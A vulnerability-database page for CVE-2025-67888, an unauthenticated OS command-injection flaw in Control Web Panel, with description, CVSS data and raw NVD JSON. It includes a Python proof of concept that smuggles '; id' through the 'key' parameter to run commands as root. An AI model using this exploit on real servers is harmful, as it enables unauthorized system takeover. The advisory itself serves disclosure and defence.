Security Vulnerability Report
中文
CVE-2025-67888 CVSS 7.3 HIGH

CVE-2025-67888

Published: 2026-05-08 07:16:28
Last Modified: 2026-05-08 16:02:14
Source: [email protected]

Description

An issue was discovered in Control Web Panel (CWP) before 0.9.8.1209. User input passed via the "key" GET parameter to /admin/index.php (when the "api" parameter is set) is not properly sanitized before being used to execute OS commands. This can be exploited by unauthenticated attackers to inject and execute arbitrary OS commands with the privileges of root on the web server. Softaculous or SitePad must be present.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Control Web Panel (CWP) < 0.9.8.1209

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-67888 Proof of Concept # Target: Control Web Panel (CWP) < 0.9.8.1209 # Description: Unauthenticated RCE via 'key' parameter # Note: Requires Softaculous or SitePad to be installed target_url = "http://target-host:2030/admin/index.php" # The 'api' parameter must be set (value often depends on config, using generic '1' here) # The 'key' parameter contains the injection point # Payload: `; id` executes the 'id' command after the original command payload = "; id" params = { "api": "1", "key": payload } try: print("[*] Sending payload to %s" % target_url) response = requests.get(target_url, params=params, timeout=10) print("Status Code: %d" % response.status_code) print("Response Headers: %s" % response.headers) print("Response Body:\n%s" % response.text) # Basic check to see if command output (uid=) is in the response if "uid=" in response.text or "gid=" in response.text: print("[+] Command injection successful!") else: print("[-] Could not confirm command execution.") except Exception as e: print("[-] An error occurred: %s" % str(e))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67888", "sourceIdentifier": "[email protected]", "published": "2026-05-08T07:16:28.487", "lastModified": "2026-05-08T16:02:14.343", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Control Web Panel (CWP) before 0.9.8.1209. User input passed via the \"key\" GET parameter to /admin/index.php (when the \"api\" parameter is set) is not properly sanitized before being used to execute OS commands. This can be exploited by unauthenticated attackers to inject and execute arbitrary OS commands with the privileges of root on the web server. Softaculous or SitePad must be present."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://karmainsecurity.com/KIS-2025-09", "source": "[email protected]"}, {"url": "https://wiki.centos-webpanel.com/cwp-security-instructions", "source": "[email protected]"}, {"url": "http://seclists.org/fulldisclosure/2025/Dec/25", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://karmainsecurity.com/KIS-2025-09", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.